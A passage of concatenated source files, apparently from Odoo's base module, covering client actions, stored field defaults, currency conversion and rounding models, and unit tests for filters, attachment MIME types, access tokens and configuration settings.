action_ids = self._search(expression.AND([[('action_id', operator, name)], args]), limit=limit, access_rights_uid=name_get_uid)
return self.browse(action_ids).name_get()
return super(IrActionsTodo, self)._name_search(name, args=args, operator=operator, limit=limit, name_get_uid=name_get_uid)
@api.multi
def action_launch(self):
""" Launch Action of Wizard"""
self.ensure_one()
self.write({'state': 'done'})
# Load action
action_type = self.action_id.type
action = self.env[action_type].browse(self.action_id.id)
result = action.read()[0]
if action_type != 'ir.actions.act_window':
return result
result.setdefault('context', '{}')
# Open a specific record when res_id is provided in the context
ctx = safe_eval(result['context'], {'user': self.env.user})
if ctx.get('res_id'):
result['res_id'] = ctx.pop('res_id')
# disable log for automatic wizards
ctx['disable_log'] = True
result['context'] = ctx
return result
@api.multi
def action_open(self):
""" Sets configuration wizard in TODO state"""
return self.write({'state': 'open'})
class IrActionsActClient(models.Model):
_name = 'ir.actions.client'
_description = 'Client Action'
_inherit = 'ir.actions.actions'
_table = 'ir_act_client'
_sequence = 'ir_actions_id_seq'
_order = 'name'
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default='ir.actions.client')
tag = fields.Char(string='Client action tag', required=True,
help="An arbitrary string, interpreted by the client"
" according to its own needs and wishes. There "
"is no central tag repository across clients.")
target = fields.Selection([('current', 'Current Window'), ('new', 'New Window'), ('fullscreen', 'Full Screen'), ('main', 'Main action of Current Window')], default="current", string='Target Window')
res_model = fields.Char(string='Destination Model', help="Optional model, mostly used for needactions.")
context = fields.Char(string='Context Value', default="{}", required=True, help="Context dictionary as Python expression, empty by default (Default: {})")
params = fields.Binary(compute='_compute_params', inverse='_inverse_params', string='Supplementary arguments',
help="Arguments sent to the client along with "
"the view tag")
params_store = fields.Binary(string='Params storage', readonly=True)
@api.depends('params_store')
def _compute_params(self):
self_bin = self.with_context(bin_size=False, bin_size_params_store=False)
for record, record_bin in pycompat.izip(self, self_bin):
record.params = record_bin.params_store and safe_eval(record_bin.params_store, {'uid': self._uid})
def _inverse_params(self):
for record in self:
params = record.params
record.params_store = repr(params) if isinstance(params, dict) else params
def _get_default_form_view(self):
doc = super(IrActionsActClient, self)._get_default_form_view()
params = doc.find(".//field[@name='params']")
params.getparent().remove(params)
params_store = doc.find(".//field[@name='params_store']")
params_store.getparent().remove(params_store)
return doc
```
#### File: base/models/ir_default.py
```python
import json
from odoo import api, fields, models, tools, _
from odoo.exceptions import ValidationError
class IrDefault(models.Model):
""" User-defined default values for fields. """
_name = 'ir.default'
_description = 'Default Values'
_rec_name = 'field_id'
field_id = fields.Many2one('ir.model.fields', string="Field", required=True,
ondelete='cascade', index=True)
user_id = fields.Many2one('res.users', string='User', ondelete='cascade', index=True,
help="If set, action binding only applies for this user.")
company_id = fields.Many2one('res.company', string='Company', ondelete='cascade', index=True,
help="If set, action binding only applies for this company")
condition = fields.Char('Condition', help="If set, applies the default upon condition.")
json_value = fields.Char('Default Value (JSON format)', required=True)
@api.model_create_multi
def create(self, vals_list):
self.clear_caches()
return super(IrDefault, self).create(vals_list)
@api.multi
def write(self, vals):
if self:
self.clear_caches()
return super(IrDefault, self).write(vals)
@api.multi
def unlink(self):
if self:
self.clear_caches()
return super(IrDefault, self).unlink()
@api.model
def set(self, model_name, field_name, value, user_id=False, company_id=False, condition=False):
""" Defines a default value for the given field. Any entry for the same
scope (field, user, company) will be replaced. The value is encoded
in JSON to be stored to the database.
:param user_id: may be ``False`` for all users, ``True`` for the
current user, or any user id
:param company_id: may be ``False`` for all companies, ``True`` for
the current user's company, or any company id
:param condition: optional condition that restricts the
applicability of the default value; this is an
opaque string, but the client typically uses
single-field conditions in the form ``'key=val'``.
"""
if user_id is True:
user_id = self.env.uid
if company_id is True:
company_id = self.env.user.company_id.id
# check consistency of model_name, field_name, and value
try:
model = self.env[model_name]
field = model._fields[field_name]
field.convert_to_cache(value, model)
json_value = json.dumps(value, ensure_ascii=False)
except KeyError:
raise ValidationError(_("Invalid field %s.%s") % (model_name, field_name))
except Exception:
raise ValidationError(_("Invalid value for %s.%s: %s") % (model_name, field_name, value))
# update existing default for the same scope, or create one
field = self.env['ir.model.fields']._get(model_name, field_name)
default = self.search([
('field_id', '=', field.id),
('user_id', '=', user_id),
('company_id', '=', company_id),
('condition', '=', condition),
])
if default:
default.write({'json_value': json_value})
else:
self.create({
'field_id': field.id,
'user_id': user_id,
'company_id': company_id,
'condition': condition,
'json_value': json_value,
})
return True
@api.model
def get(self, model_name, field_name, user_id=False, company_id=False, condition=False):
""" Return the default value for the given field, user and company, or
``None`` if no default is available.
:param user_id: may be ``False`` for all users, ``True`` for the
current user, or any user id
:param company_id: may be ``False`` for all companies, ``True`` for
the current user's company, or any company id
:param condition: optional condition that restricts the
applicability of the default value; this is an
opaque string, but the client typically uses
single-field conditions in the form ``'key=val'``.
"""
if user_id is True:
user_id = self.env.uid
if company_id is True:
company_id = self.env.user.company_id.id
field = self.env['ir.model.fields']._get(model_name, field_name)
default = self.search([
('field_id', '=', field.id),
('user_id', '=', user_id),
('company_id', '=', company_id),
('condition', '=', condition),
], limit=1)
return json.loads(default.json_value) if default else None
@api.model
@tools.ormcache('self.env.uid', 'model_name', 'condition')
# Note about ormcache invalidation: it is not needed when deleting a field,
# a user, or a company, as the corresponding defaults will no longer be
# requested. It must only be done when a user's company is modified.
def get_model_defaults(self, model_name, condition=False):
""" Return the available default values for the given model (for the
current user), as a dict mapping field names to values.
"""
cr = self.env.cr
query = """ SELECT f.name, d.json_value FROM ir_default d
JOIN ir_model_fields f ON d.field_id=f.id
JOIN res_users u ON u.id=%s
WHERE f.model=%s
AND (d.user_id IS NULL OR d.user_id=u.id)
AND (d.company_id IS NULL OR d.company_id=u.company_id)
AND {}
ORDER BY d.user_id, d.company_id, d.id
"""
params = [self.env.uid, model_name]
if condition:
query = query.format("d.condition=%s")
params.append(condition)
else:
query = query.format("d.condition IS NULL")
cr.execute(query, params)
result = {}
for row in cr.fetchall():
# keep the highest priority default for each field
if row[0] not in result:
result[row[0]] = json.loads(row[1])
return result
@api.model
def discard_records(self, records):
""" Discard all the defaults of many2one fields using any of the given
records.
"""
json_vals = [json.dumps(id) for id in records.ids]
domain = [('field_id.ttype', '=', 'many2one'),
('field_id.relation', '=', records._name),
('json_value', 'in', json_vals)]
return self.search(domain).unlink()
@api.model
def discard_values(self, model_name, field_name, values):
""" Discard all the defaults for any of the given values. """
field = self.env['ir.model.fields']._get(model_name, field_name)
json_vals = [json.dumps(value, ensure_ascii=False) for value in values]
domain = [('field_id', '=', field.id), ('json_value', 'in', json_vals)]
return self.search(domain).unlink()
```
#### File: base/models/res_currency.py
```python
import logging
import math
import re
import time
import traceback
from odoo import api, fields, models, tools, _
_logger = logging.getLogger(__name__)
try:
from num2words import num2words
except ImportError:
_logger.warning("The num2words python library is not installed, amount-to-text features won't be fully available.")
num2words = None
CURRENCY_DISPLAY_PATTERN = re.compile(r'(\w+)\s*(?:\((.*)\))?')
class Currency(models.Model):
_name = "res.currency"
_description = "Currency"
_order = 'active desc, name'
# Note: 'code' column was removed as of v6.0, the 'name' should now hold the ISO code.
name = fields.Char(string='Currency', size=3, required=True, help="Currency Code (ISO 4217)")
symbol = fields.Char(help="Currency sign, to be used when printing amounts.", required=True)
rate = fields.Float(compute='_compute_current_rate', string='Current Rate', digits=(12, 6),
help='The rate of the currency to the currency of rate 1.')
rate_ids = fields.One2many('res.currency.rate', 'currency_id', string='Rates')
rounding = fields.Float(string='Rounding Factor', digits=(12, 6), default=0.01)
decimal_places = fields.Integer(compute='_compute_decimal_places', store=True)
active = fields.Boolean(default=True)
position = fields.Selection([('after', 'After Amount'), ('before', 'Before Amount')], default='after',
string='Symbol Position', help="Determines where the currency symbol should be placed after or before the amount.")
date = fields.Date(compute='_compute_date')
currency_unit_label = fields.Char(string="Currency Unit", help="Currency Unit Name")
currency_subunit_label = fields.Char(string="Currency Subunit", help="Currency Subunit Name")
_sql_constraints = [
('unique_name', 'unique (name)', 'The currency code must be unique!'),
('rounding_gt_zero', 'CHECK (rounding>0)', 'The rounding factor must be greater than 0!')
]
def _get_rates(self, company, date):
query = """SELECT c.id,
COALESCE((SELECT r.rate FROM res_currency_rate r
WHERE r.currency_id = c.id AND r.name <= %s
AND (r.company_id IS NULL OR r.company_id = %s)
ORDER BY r.company_id, r.name DESC
LIMIT 1), 1.0) AS rate
FROM res_currency c
WHERE c.id IN %s"""
self._cr.execute(query, (date, company.id, tuple(self.ids)))
currency_rates = dict(self._cr.fetchall())
return currency_rates
@api.multi
@api.depends('rate_ids.rate')
def _compute_current_rate(self):
date = self._context.get('date') or fields.Date.today()
company = self.env['res.company'].browse(self._context.get('company_id')) or self.env['res.users']._get_company()
# the subquery selects the last rate before 'date' for the given currency/company
currency_rates = self._get_rates(company, date)
for currency in self:
currency.rate = currency_rates.get(currency.id) or 1.0
@api.multi
@api.depends('rounding')
def _compute_decimal_places(self):
for currency in self:
if 0 < currency.rounding < 1:
currency.decimal_places = int(math.ceil(math.log10(1/currency.rounding)))
else:
currency.decimal_places = 0
@api.multi
@api.depends('rate_ids.name')
def _compute_date(self):
for currency in self:
currency.date = currency.rate_ids[:1].name
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
results = super(Currency, self)._name_search(name, args, operator=operator, limit=limit, name_get_uid=name_get_uid)
if not results:
name_match = CURRENCY_DISPLAY_PATTERN.match(name)
if name_match:
results = super(Currency, self)._name_search(name_match.group(1), args, operator=operator, limit=limit, name_get_uid=name_get_uid)
return results
@api.multi
def name_get(self):
return [(currency.id, tools.ustr(currency.name)) for currency in self]
@api.multi
def amount_to_text(self, amount):
self.ensure_one()
def _num2words(number, lang):
try:
return num2words(number, lang=lang).title()
except NotImplementedError:
return num2words(number, lang='en').title()
if num2words is None:
logging.getLogger(__name__).warning("The library 'num2words' is missing, cannot render textual amounts.")
return ""
formatted = "%.{0}f".format(self.decimal_places) % amount
parts = formatted.partition('.')
integer_value = int(parts[0])
fractional_value = int(parts[2] or 0)
lang_code = self.env.context.get('lang') or self.env.user.lang
lang = self.env['res.lang'].with_context(active_test=False).search([('code', '=', lang_code)])
amount_words = tools.ustr('{amt_value} {amt_word}').format(
amt_value=_num2words(integer_value, lang=lang.iso_code),
amt_word=self.currency_unit_label,
)
if not self.is_zero(amount - integer_value):
amount_words += ' ' + _('and') + tools.ustr(' {amt_value} {amt_word}').format(
amt_value=_num2words(fractional_value, lang=lang.iso_code),
amt_word=self.currency_subunit_label,
)
return amount_words
@api.multi
def round(self, amount):
"""Return ``amount`` rounded according to ``self``'s rounding rules.
:param float amount: the amount to round
:return: rounded float
"""
# TODO: Need to check why it calls round() from sale.py, _amount_all() with *No* ID after below commits,
# https://github.com/odoo/odoo/commit/36ee1ad813204dcb91e9f5f20d746dff6f080ac2
# https://github.com/odoo/odoo/commit/0b6058c585d7d9a57bd7581b8211f20fca3ec3f7
# Removing self.ensure_one() will make few test cases to break of modules event_sale, sale_mrp and stock_dropshipping.
#self.ensure_one()
return tools.float_round(amount, precision_rounding=self.rounding)
@api.multi
def compare_amounts(self, amount1, amount2):
"""Compare ``amount1`` and ``amount2`` after rounding them according to the
given currency's precision..
An amount is considered lower/greater than another amount if their rounded
value is different. This is not the same as having a non-zero difference!
For example 1.432 and 1.431 are equal at 2 digits precision,
so this method would return 0.
However 0.006 and 0.002 are considered different (returns 1) because
they respectively round to 0.01 and 0.0, even though
0.006-0.002 = 0.004 which would be considered zero at 2 digits precision.
:param float amount1: first amount to compare
:param float amount2: second amount to compare
:return: (resp.) -1, 0 or 1, if ``amount1`` is (resp.) lower than,
equal to, or greater than ``amount2``, according to
``currency``'s rounding.
With the new API, call it like: ``currency.compare_amounts(amount1, amount2)``.
"""
return tools.float_compare(amount1, amount2, precision_rounding=self.rounding)
@api.multi
def is_zero(self, amount):
"""Returns true if ``amount`` is small enough to be treated as
zero according to current currency's rounding rules.
Warning: ``is_zero(amount1-amount2)`` is not always equivalent to
``compare_amounts(amount1,amount2) == 0``, as the former will round after
computing the difference, while the latter will round before, giving
different results for e.g. 0.006 and 0.002 at 2 digits precision.
:param float amount: amount to compare with currency's zero
With the new API, call it like: ``currency.is_zero(amount)``.
"""
return tools.float_is_zero(amount, precision_rounding=self.rounding)
@api.model
def _get_conversion_rate(self, from_currency, to_currency, company, date):
currency_rates = (from_currency + to_currency)._get_rates(company, date)
res = currency_rates.get(to_currency.id) / currency_rates.get(from_currency.id)
return res
def _convert(self, from_amount, to_currency, company, date, round=True):
"""Returns the converted amount of ``from_amount``` from the currency
``self`` to the currency ``to_currency`` for the given ``date`` and
company.
:param company: The company from which we retrieve the convertion rate
:param date: The nearest date from which we retriev the conversion rate.
:param round: Round the result or not
"""
self, to_currency = self or to_currency, to_currency or self
assert self, "convert amount from unknown currency"
assert to_currency, "convert amount to unknown currency"
assert company, "convert amount from unknown company"
assert date, "convert amount from unknown date"
# apply conversion rate
if self == to_currency:
to_amount = from_amount
else:
to_amount = from_amount * self._get_conversion_rate(self, to_currency, company, date)
# apply rounding
return to_currency.round(to_amount) if round else to_amount
@api.model
def _compute(self, from_currency, to_currency, from_amount, round=True):
_logger.warning('The `_compute` method is deprecated. Use `_convert` instead')
date = self._context.get('date') or fields.Date.today()
company = self.env['res.company'].browse(self._context.get('company_id')) or self.env['res.users']._get_company()
return from_currency._convert(from_amount, to_currency, company, date)
@api.multi
def compute(self, from_amount, to_currency, round=True):
_logger.warning('The `compute` method is deprecated. Use `_convert` instead')
date = self._context.get('date') or fields.Date.today()
company = self.env['res.company'].browse(self._context.get('company_id')) or self.env['res.users']._get_company()
return self._convert(from_amount, to_currency, company, date)
def _select_companies_rates(self):
return """
SELECT
r.currency_id,
COALESCE(r.company_id, c.id) as company_id,
r.rate,
r.name AS date_start,
(SELECT name FROM res_currency_rate r2
WHERE r2.name > r.name AND
r2.currency_id = r.currency_id AND
(r2.company_id is null or r2.company_id = c.id)
ORDER BY r2.name ASC
LIMIT 1) AS date_end
FROM res_currency_rate r
JOIN res_company c ON (r.company_id is null or r.company_id = c.id)
"""
class CurrencyRate(models.Model):
_name = "res.currency.rate"
_description = "Currency Rate"
_order = "name desc"
name = fields.Date(string='Date', required=True, index=True,
default=lambda self: fields.Date.today())
rate = fields.Float(digits=(12, 6), default=1.0, help='The rate of the currency to the currency of rate 1')
currency_id = fields.Many2one('res.currency', string='Currency', readonly=True)
company_id = fields.Many2one('res.company', string='Company',
default=lambda self: self.env.user.company_id)
_sql_constraints = [
('unique_name_per_day', 'unique (name,currency_id,company_id)', 'Only one currency rate per day allowed!'),
('currency_rate_check', 'CHECK (rate>0)', 'The currency rate must be strictly positive.'),
]
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
if operator in ['=', '!=']:
try:
date_format = '%Y-%m-%d'
if self._context.get('lang'):
lang_id = self.env['res.lang']._search([('code', '=', self._context['lang'])], access_rights_uid=name_get_uid)
if lang_id:
date_format = self.browse(lang_id).date_format
name = time.strftime('%Y-%m-%d', time.strptime(name, date_format))
except ValueError:
try:
args.append(('rate', operator, float(name)))
except ValueError:
return []
name = ''
operator = 'ilike'
return super(CurrencyRate, self)._name_search(name, args=args, operator=operator, limit=limit, name_get_uid=name_get_uid)
```
#### File: base/tests/test_ir_filters.py
```python
from odoo import exceptions
from odoo.tests.common import TransactionCase, ADMIN_USER_ID
def noid(seq):
""" Removes values that are not relevant for the test comparisons """
for d in seq:
d.pop('id', None)
d.pop('action_id', None)
return seq
class FiltersCase(TransactionCase):
def build(self, model, *args):
Model = self.env[model].sudo(ADMIN_USER_ID)
for vals in args:
Model.create(vals)
class TestGetFilters(FiltersCase):
def setUp(self):
super(TestGetFilters, self).setUp()
self.USER_NG = self.env['res.users'].name_search('demo')[0]
self.USER_ID = self.USER_NG[0]
def test_own_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=self.USER_ID, model_id='ir.filters'))
filters = self.env['ir.filters'].sudo(self.USER_ID).get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
dict(name='b', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
dict(name='c', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
dict(name='d', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
])
def test_global_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
dict(name='c', user_id=False, model_id='ir.filters'),
dict(name='d', user_id=False, model_id='ir.filters'),
)
filters = self.env['ir.filters'].sudo(self.USER_ID).get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='b', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='c', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='d', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
])
def test_no_third_party_filters(self):
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=ADMIN_USER_ID, model_id='ir.filters'),
dict(name='c', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='d', user_id=ADMIN_USER_ID, model_id='ir.filters') )
filters = self.env['ir.filters'].sudo(self.USER_ID).get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', is_default=False, user_id=False, domain='[]', context='{}', sort='[]'),
dict(name='c', is_default=False, user_id=self.USER_NG, domain='[]', context='{}', sort='[]'),
])
class TestOwnDefaults(FiltersCase):
def setUp(self):
super(TestOwnDefaults, self).setUp()
self.USER_NG = self.env['res.users'].name_search('demo')[0]
self.USER_ID = self.USER_NG[0]
def test_new_no_filter(self):
"""
When creating a @is_default filter with no existing filter, that new
filter gets the default flag
"""
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=True,
domain='[]', context='{}', sort='[]')
])
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='c', user_id=self.USER_NG, is_default=True, domain='[]', context='{}', sort='[]'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, the flag should be *moved* from the old to the new filter
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='c', user_id=self.USER_NG, is_default=True, domain='[]', context='{}', sort='[]'),
])
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if an other filter
already has the flag the flag should be moved
"""
self.build(
'ir.filters',
dict(name='a', user_id=self.USER_ID, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=self.USER_ID, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'a',
'model_id': 'ir.filters',
'user_id': self.USER_ID,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=self.USER_NG, is_default=True, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=self.USER_NG, is_default=False, domain='[]', context='{}', sort='[]'),
])
class TestGlobalDefaults(FiltersCase):
def setUp(self):
super(TestGlobalDefaults, self).setUp()
self.USER_NG = self.env['res.users'].name_search('demo')[0]
self.USER_ID = self.USER_NG[0]
def test_new_filter_not_default(self):
"""
When creating a @is_default filter with existing non-default filters,
the new filter gets the flag
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=False, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='c', user_id=False, is_default=True, domain='[]', context='{}', sort='[]'),
])
def test_new_filter_existing_default(self):
"""
When creating a @is_default filter where an existing filter is already
@is_default, an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace({
'name': 'c',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_filter_set_default(self):
"""
When updating an existing filter to @is_default, if an other filter
already has the flag an error should be generated
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
with self.assertRaises(exceptions.Warning):
Filters.create_or_replace({
'name': 'a',
'model_id': 'ir.filters',
'user_id': False,
'is_default': True,
})
def test_update_default_filter(self):
"""
Replacing the current default global filter should not generate any error
"""
self.build(
'ir.filters',
dict(name='a', user_id=False, model_id='ir.filters'),
dict(name='b', is_default=True, user_id=False, model_id='ir.filters'),
)
Filters = self.env['ir.filters'].sudo(self.USER_ID)
context_value = "{'some_key': True}"
Filters.create_or_replace({
'name': 'b',
'model_id': 'ir.filters',
'user_id': False,
'context': context_value,
'is_default': True,
})
filters = Filters.get_filters('ir.filters')
self.assertItemsEqual(noid(filters), [
dict(name='a', user_id=False, is_default=False, domain='[]', context='{}', sort='[]'),
dict(name='b', user_id=False, is_default=True, domain='[]', context=context_value, sort='[]'),
])
class TestReadGroup(TransactionCase):
"""Test function read_group with groupby on a many2one field to a model
(in test, "user_id" to "res.users") which is ordered by an inherited not stored field (in
test, "name" inherited from "res.partners").
"""
def test_read_group_1(self):
Users = self.env['res.users']
self.assertEqual(Users._order, "name, login", "Model res.users must be ordered by name, login")
self.assertFalse(Users._fields['name'].store, "Field name is not stored in res.users")
Filters = self.env['ir.filters']
filter_a = Filters.create(dict(name="Filter_A", model_id="ir.filters"))
filter_b = Filters.create(dict(name="Filter_B", model_id="ir.filters"))
filter_b.write(dict(user_id=False))
res = Filters.read_group([], ['name', 'user_id'], ['user_id'])
self.assertTrue(any(val['user_id'] == False for val in res), "At least one group must contain val['user_id'] == False.")
```
#### File: base/tests/test_ir_http.py
```python
from odoo.tests import common
import odoo
GIF = b"R0lGODdhAQABAIAAAP///////ywAAAAAAQABAAACAkQBADs="
class test_ir_http_mimetype(common.TransactionCase):
def test_ir_http_mimetype_attachment(self):
""" Test mimetype for attachment """
attachment = self.env['ir.attachment'].create({
'datas': GIF,
'name': 'Test mimetype gif',
'datas_fname': 'file.gif'})
status, headers, content = self.env['ir.http'].binary_content(
id=attachment.id,
mimetype=None,
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
self.assertEqual(mimetype, 'image/gif')
def test_ir_http_mimetype_attachment_name(self):
""" Test mimetype for attachment with bad name"""
attachment = self.env['ir.attachment'].create({
'datas': GIF,
'name': 'Test mimetype gif with png name',
'datas_fname': 'file.png'})
status, headers, content = self.env['ir.http'].binary_content(
id=attachment.id,
mimetype=None,
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
# TODO: fix and change it in master, should be image/gif
self.assertEqual(mimetype, 'image/png')
def test_ir_http_mimetype_basic_field(self):
""" Test mimetype for classic field """
partner = self.env['res.partner'].create({
'image': GIF,
'name': 'Test mimetype basic field',
})
status, headers, content = self.env['ir.http'].binary_content(
model='res.partner',
id=partner.id,
field='image',
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
self.assertEqual(mimetype, 'image/gif')
def test_ir_http_mimetype_computed_field(self):
""" Test mimetype for computed field wich resize picture"""
prop = self.env['ir.property'].create({
'fields_id': self.env['ir.model.fields'].search([], limit=1).id,
'name': "Property binary",
'value_binary': GIF,
'type': 'binary',
})
resized = odoo.tools.image_get_resized_images(prop.value_binary, return_big=True, avoid_resize_medium=True)['image_small']
# Simul computed field which resize and that is not attachement=True (E.G. on product)
prop.write({'value_binary': resized})
status, headers, content = self.env['ir.http'].binary_content(
model='ir.property',
id=prop.id,
field='value_binary',
default_mimetype='application/octet-stream',
env=self.env
)
mimetype = dict(headers).get('Content-Type')
self.assertEqual(mimetype, 'image/gif')
def test_ir_http_attachment_access(self):
""" Test attachment access with and without access token """
public_user = self.env.ref('base.public_user')
attachment = self.env['ir.attachment'].create({
'datas': GIF,
'name': 'Test valid access token with image',
'datas_fname': 'image.gif'
})
defaults = {
'id': attachment.id,
'default_mimetype': 'image/gif',
'env': public_user.sudo(public_user.id).env,
}
def test_access(**kwargs):
status, _, _ = self.env['ir.http'].binary_content(
**dict(defaults, **kwargs)
)
return status
status = test_access()
self.assertEqual(status, 403, "no access")
status = test_access(access_token=u'Secret')
self.assertEqual(status, 403,
"no access if access token for attachment without access token")
attachment.access_token = u'Secret'
status = test_access(access_token=u'Secret')
self.assertEqual(status, 200, "access for correct access token")
status = test_access(access_token=u'Wrong')
self.assertEqual(status, 403, "no access for wrong access token")
attachment.public = True
status = test_access()
self.assertEqual(status, 200, "access for attachment with access")
status = test_access(access_token=u'Wrong')
self.assertEqual(status, 403,
"no access for wrong access token for attachment with access")
attachment.unlink()
status = test_access()
self.assertEqual(status, 404, "no access for deleted attachment")
status = test_access(access_token=u'Secret')
self.assertEqual(status, 404,
"no access with access token for deleted attachment")
```
#### File: base/tests/test_res_config.py
```python
import logging
from odoo import exceptions
from odoo.tests.common import TransactionCase, tagged
from odoo.tools import pycompat
_logger = logging.getLogger(__name__)
class TestResConfig(TransactionCase):
def setUp(self):
super(TestResConfig, self).setUp()
self.ResConfig = self.env['res.config.settings']
# Define the test values
self.menu_xml_id = 'base.menu_action_res_users'
self.full_field_name = 'res.partner.lang'
self.error_msg = "WarningRedirect test string: %(field:res.partner.lang)s - %(menu:base.menu_action_res_users)s."
self.error_msg_wo_menu = "WarningRedirect test string: %(field:res.partner.lang)s."
# Note: see the get_config_warning() doc for a better example
# Fetch the expected values
menu = self.env.ref(self.menu_xml_id)
model_name, field_name = self.full_field_name.rsplit('.', 1)
self.expected_path = menu.complete_name
self.expected_action_id = menu.action.id
self.expected_name = self.env[model_name].fields_get([field_name])[field_name]['string']
self.expected_final_error_msg = self.error_msg % {
'field:res.partner.lang': self.expected_name,
'menu:base.menu_action_res_users': self.expected_path
}
self.expected_final_error_msg_wo_menu = self.error_msg_wo_menu % {
'field:res.partner.lang': self.expected_name,
}
def test_00_get_option_path(self):
""" The get_option_path() method should return a tuple containing a string and an integer """
res = self.ResConfig.get_option_path(self.menu_xml_id)
# Check types
self.assertIsInstance(res, tuple)
self.assertEqual(len(res), 2, "The result should contain 2 elements")
self.assertIsInstance(res[0], pycompat.string_types)
self.assertIsInstance(res[1], pycompat.integer_types)
# Check returned values
self.assertEqual(res[0], self.expected_path)
self.assertEqual(res[1], self.expected_action_id)
def test_10_get_option_name(self):
""" The get_option_name() method should return a string """
res = self.ResConfig.get_option_name(self.full_field_name)
# Check type
self.assertIsInstance(res, pycompat.string_types)
# Check returned value
self.assertEqual(res, self.expected_name)
def test_20_get_config_warning(self):
""" The get_config_warning() method should return a RedirectWarning """
res = self.ResConfig.get_config_warning(self.error_msg)
# Check type
self.assertIsInstance(res, exceptions.RedirectWarning)
# Check returned value
self.assertEqual(res.args[0], self.expected_final_error_msg)
self.assertEqual(res.args[1], self.expected_action_id)
def test_30_get_config_warning_wo_menu(self):
""" The get_config_warning() method should return a Warning exception """
res = self.ResConfig.get_config_warning(self.error_msg_wo_menu)
# Check type
self.assertIsInstance(res, exceptions.Warning)
# Check returned value
self.assertEqual(res.args[0], self.expected_final_error_msg_wo_menu)
@tagged('post_install', '-at_install')
class TestResConfigExecute(TransactionCase):
def test_01_execute_res_config(self):
"""
Try to create and execute all res_config models. Target settings that can't be
loaded or saved and avoid remaining methods `get_default_foo` or `set_foo` that
won't be executed is foo != `fields`
"""
all_config_settings = self.env['ir.model'].search([('name', 'like', 'config.settings')])
for config_settings in all_config_settings:
_logger.info("Testing %s" % (config_settings.name))
self.env[config_settings.name].create({}).execute()
```
#### File: base/wizard/base_export_language.py
```python
